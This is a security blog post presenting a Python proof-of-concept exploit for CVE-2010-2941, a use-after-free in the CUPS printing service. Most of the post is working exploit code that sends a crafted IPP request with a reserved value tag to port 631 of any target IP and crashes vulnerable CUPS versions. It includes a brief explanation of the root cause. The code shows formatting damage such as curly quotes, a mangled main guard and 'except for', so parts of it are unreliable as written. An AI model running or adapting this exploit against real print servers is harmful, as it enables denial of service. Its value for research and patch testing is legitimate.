CUPS IPP Use-After-Free Denial of Service Vulnerability Proof of Concept [CVE-2010-2941]

Fellas,
SecPod Research Team member “Veerendra GG” has written a valid working POC to crash CUPS Service. The POC is written based on the information provided in RedHat Bugzilla (CVE-2010-2941) which sends a malformed IPP (Internet Printing Protocol) packets over TCP. For more information on this vulnerability, you can refer here. You can manage these Vulnerabilities with the help of a good Vulnerability Management Tool. Well, inline comments inside the Python script can help you more to figure out how the bug was reproduced to crash the service. The Vulnerability Management System can resolve these issues and keep your infrastructures safe. For brevity, the poc is posted below as well.

POC: Download here
Packet Capture: Download here

[code=python]#!/usr/bin/python

##############################################################################

CVE: CVE-2010-2941

Exploit: https://www.secpod.com/blog/?p=157

http://secpod.org/CVE-2010-2941-Cups-Dos-POC.zip

Reference: https://bugzilla.redhat.com/show_bug.cgi?id=624438

Author: Veerendra G.G from SecPod Technologies (www.secpod.com)

#

Exploit CVE-2010-2941 will crash CUPS Service

Tested against 1.4.1 and 1.4.4

##############################################################################

import sys, socket

def sendPacket(HOST, PORT, data1, data2):
”’
Sends data to a particular host on a specified port
with a given data
”’
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
s.send(data1)
s.send(data2)
data = s.recv(1024)
s.close()

return data

if name == “main“:

if len(sys.argv) < 2:
print “\tUsage: python exploit.py target_ip”
print “\tExample : python exploit.py 127.0.0.1”
print “\tExiting…”
sys.exit(0)

HOST = sys.argv[1] ## The host ip
PORT = 631 ## Default cups port

POST Request

data1 = ‘POST /ipp/ HTTP/1.1\r\n’ +\
‘Host: 10.10.10.251\r\n’ +\
‘User-Agent: CUPS/1.3.4\r\n’ +\
‘Content-Length: 289\r\n’ +\
‘Content-Type: application/ipp\r\n’ +\
‘Expect: 100-continue\r\n\r\n’

IPP Request

data2 = ‘\x01\x01’ ## Version 1.1
data2 += ‘\x00\x0b’ ## Operation-id Get-Printer-Attributes
data2 += ‘\x00\x00\x00\x01’ ## Request ID 1

Operation Attributes

Attribute charset: utf-8

data2 += ‘\x01’
data2 += ‘\x47’ ## Tag: Character Set
data2 += ‘\x00\x12’ ## Name Length: 18
data2 += ‘\x61\x74\x74\x72\x69\x62\x75\x74\x65\x73\x2d\x63\x68\x61\x72’ +\
‘\x73\x65\x74’ ## Name: Attribute charset
data2 += ‘\x00\x05’ ## Value Length: 5
data2 += ‘\x75\x74\x66\x2d\x38’ ## Value utf-8

Attributes Natural Language

data2 += ‘\x48’ ## Tag: Natural Language
data2 += ‘\x00\x1b’ ## Name Length: 27
data2 += ‘\x61\x74\x74\x72\x69\x62\x75\x74\x65\x73\x2d\x6e\x61\x74\x75’ +\
‘\x72\x61\x6c\x2d\x6c\x61\x6e\x67\x75\x61\x67\x65’

Name: Attribute Natural Language

data2 += ‘\x00\x05’ ## Value Length: 5
data2 += ‘\x65\x6e\x2d\x75\x73’ ## Value: en-us

Printer URI:

data2 += ‘\x45’ ## Tag: URI
data2 += ‘\x00\x0b’ ## Name Length: 11
data2 += ‘\x70\x72\x69\x6e\x74\x65\x72\x2d\x75\x72\x69’ ## Name:Printer URI
data2 += ‘\x00\x1b’ ## Value Length: 27
data2 += ‘\x69\x70\x70\x3a\x2f\x2f\x31\x30\x2e\x31\x30\x2e\x31\x30\x2e’ +\
‘\x32\x35\x31\x3a\x36\x33\x31\x2f\x69\x70\x70\x2f’

Value: IPP://10.10.10.251:631/ipp/

In the IPP protocol, an attribute can have multiple values, and each value is typed. In the CUPS data model for this, all values for a given attribute must have the same (or a compatible) type. By giving the first value for an attribute a value tag of 56(0x38), which does not correspond to any particular value type and so is ‘unknown’, but which also is accepted as ‘compatible’ with string types due to the value tag range check, CUPS does not reject the request.

Request Attributes

data2 += ‘\x38’ ## Tag: Reserved

This field is causing the problem Tag: \x38 = 56,

Tag : \x38 and \x39 and \x40 all these are “Reserved”

Hence crashes for all these values

data2 += ‘\x00\x14’ ## Name Length: 20
data2 += ‘\x72\x65\x71\x75\x65\x73\x74\x65\x64\x2d\x61\x74\x74\x72\x69’ +\
‘\x62\x75\x74\x65\x73’ ## Name: Requested Attributes
data2 += ‘\x00\x10’ ## Value Length: 16
data2 += ‘\x63\x6f\x70\x69\x65\x73\x2d\x73\x75\x70\x70\x6f\x72\x74\x65’ +\
‘\x64’ ## Value

data2 += ‘\x44’ ## Tag: Keyword
data2 += ‘\x00\x00’ ## Name Length: 0
data2 += ‘\x00\x19’ ## Value Length: 25
data2 += ‘\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2d\x66\x6f\x72\x6d\x61\x74’ +\
‘\x2d\x73\x75\x70\x70\x6f\x72\x74\x65\x64’

Value: Document Format Supported

data2 += ‘\x44’ ## Tag: Keyword
data2 += ‘\x00\x00’ ## Name Length: 0
data2 += ‘\x00\x19’ ## Value Length: 25
data2 += ‘\x70\x72\x69\x6e\x74\x65\x72\x2d\x69\x73\x2d\x61\x63\x63\x65’ +\
‘\x70\x74\x69\x6e\x67\x2d\x6a\x6f\x62\x73’

Value: The printer is Accepting Jobs

data2 += ‘\x44’ ## Tag: Keyword
data2 += ‘\x00\x00’ ## Name Length: 0
data2 += ‘\x00\x0d’ ## Value Length: 13
data2 += ‘\x70\x72\x69\x6e\x74\x65\x72\x2d\x73\x74\x61\x74\x65’

Value: Printer State

data2 += ‘\x44’ ## Tag: Keyword
data2 += ‘\x00\x00’ ## Name Length: 0
data2 += ‘\x00\x15’ ## Value Length: 21
data2 += ‘\x70\x72\x69\x6e\x74\x65\x72\x2d\x73\x74\x61\x74\x65\x2d\x6d’ +\
‘\x65\x73\x73\x61\x67\x65’ ## Value: Printer State Message

data2 += ‘\x44’ ## Tag: Keyword
data2 += ‘\x00\x00’ ## Name Length: 0
data2 += ‘\x00\x15’ ## Value Length: 21
data2 += ‘\x70\x72\x69\x6e\x74\x65\x72\x2d\x73\x74\x61\x74\x65\x2d\x72’ +\
‘\x65\x61\x73\x6f\x6e\x73’ ## Value: Printer State Reasons

data2 += ‘\x03’ ## End of Attributes

try:
print “\tSending Crafted Packet to CUPS Service…”
sendPacket(HOST, PORT, data1, data2)
print “\tSent Crafted Packet Successfully…”
print “\tCheck the CUPS Service, ” +\
“It will crash if it’s a vulnerable version…”
except for Exception, msg:
if “Connection refused” == msg[1]:
print “\tUnable to Connect to CUPS Service…”
else:
print “Exception: “, msg[/code]

Please let us know if you have any feedback or suggestions. 🙂

Cheers!
SecPod Research Team
www.secpod.com